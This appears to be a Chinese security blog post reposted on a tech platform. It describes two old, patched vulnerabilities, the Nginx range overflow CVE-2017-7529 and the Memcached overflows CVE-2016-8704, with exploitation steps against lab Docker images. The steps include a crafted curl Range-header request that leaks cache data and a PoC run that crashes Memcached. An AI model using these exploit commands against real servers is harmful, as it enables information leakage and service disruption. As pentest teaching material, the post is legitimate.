分享两个渗透测试中容易忽略的小漏洞

Nginx整数溢出漏洞 CVE-2017-7529

漏洞信息

• 当使用nginx标准模块时,攻击者可以通过发送包含恶意构造range 域的 header 请求,来获取响应中的缓存文件头部信息。在某些配置中,缓存文件头可能包含后端服务器的IP地址或其它敏感信息,从而导致信息泄露。

• 参考:【漏洞分析】Nginx range 过滤器整形溢出漏洞(CVE–2017–7529)预警分析

漏洞影响

• 该漏洞影响所有 0.5.6 - 1.13.2版本内默认配置模块的Nginx只需要开启缓存攻击者即可发送恶意请求进行远程攻击造成信息泄露。

• 当Nginx服务器使用代理缓存的情况下攻击者通过利用该漏洞可以拿到服务器的后端真实IP或其他敏感信息。

• 通过我们的分析判定该漏洞利用难度低可以归属于low-hanging-fruit的漏洞在真实网络攻击中也有一定利用价值。

影响版本

• Nginx version 0.5.6 - 1.13.2

修复版本

• Nginx version 1.13.3, 1.12.1

利用方法

• docker pull medicean/vulapps:n_nginx_1

• docker run -d -p 9000:80 medicean/vulapps:n_nginx_1

• curl -I http://ip:port/proxy/demo.png

• 看到 Content-Length: 16585, 找个比这个数大的值,例如 17208, 第二个 range 值为 0x8000000000000000-17208, 也就是 9223372036854758600

• curl -i http://ip:port/proxy/demo.png -r -17208,-9223372036854758600

泄露出的信息

Memcached Server APPEND/PREPEND 远程代码执行漏洞

Memcached被曝存在多个整数溢出漏洞(CVE-2016-8704、CVE-2016-8705、CVE-2016-8706),可导致远程代码执行。这些漏洞存在于用于插入(inserting)、附加(appending,)、前置(appending)、修改键值对的函数中,在SASL身份验证位置也存在问题。 攻击者可以通过向服务器发送一个精心构造的Memcached命令实现该漏洞的利用。此外,这些漏洞还可以泄露敏感的进程信息,并且可以多次触发,利用这些敏感的进程信息,攻击者可以绕过像ASLR等常见的漏洞缓解机制。 漏洞披露:2016年10月10日 漏洞修补:2016年10月12 日 公开发布:2016年10月31日

利用方法

• docker pull medicean/vulapps:m_memcached_CVE-2016-8704

• docker run -d -p 11211:11211medicean/vulapps:m_memcached_CVE-2016-8704

• python poc.py 被攻击机 11211

执行完之后服务崩溃

原文发布于微信公众号 - 网络安全社区悦信安(yuexin_an)

原文发表时间:2017-11-05

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏dalaoyang

Jenkins部署码云SpringBoot项目到远程服务器

这里需要在 系统管理->系统设置->Publish over SSH配置远程部署的服务器,如图:

21820
来自专栏Samego开发资源

ubuntu动态一键切换python版本

25540
来自专栏Brian

Install Django Nginx uWSGI

概述 最近项目需要安装和配置多站点环境,所以把多站点开发环境配置和安装记录下来,帮助其他人少走坑。 安装Python 2.7.x 首先安装一些开发环境基本的包和...

41090
来自专栏影子

idea/eclipse下Maven工程集成web服务(tomcat、jetty)

转载请注明出处:http://www.cnblogs.com/funnyzpc/p/8093554.html

14120
来自专栏华仔的技术笔记

Github里面那个build的小图标是怎么玩的?

例如上面这个小图标,github上的工程build后,会显示编译后的状态,通过还是编译失败。

10730
来自专栏Java学习123

IBM Websphere Message Broker(MB) 教程系列-(1) 在Fedora

409100
来自专栏猿人谷

mac下使用github

      提起github相信大家都不会陌生,在这里就不再赘述了。作为开源代码库以及版本控制系统,使用好了确实会非常受益,再说的势利点,你找工作时给面试官说你...

21750
来自专栏Dato

Maven的作用是什么

现在我们开发的项目基本上都是maven项目,maven项目也是一个项目,类似于javaProject,javaWebProject,就是多了些功能。 那就说说究...

364110
来自专栏埋名

CentOS7安装维护Gitlab

下面是官网复制过来的官方安装方法,最简单的安装,在我大天朝,只能望天兴叹,你可翻墙安装或者略过这里,看下面的。

78430
来自专栏华章科技

收藏 | Linux常用156个命令汇总!

linux命令是对Linux系统进行管理的命令。对于Linux系统来说,无论是中央处理器、内存、磁盘驱动器、键盘、鼠标,还是用户等都是文件,Linux系统管理的...

21720

扫码关注云+社区

领取腾讯云代金券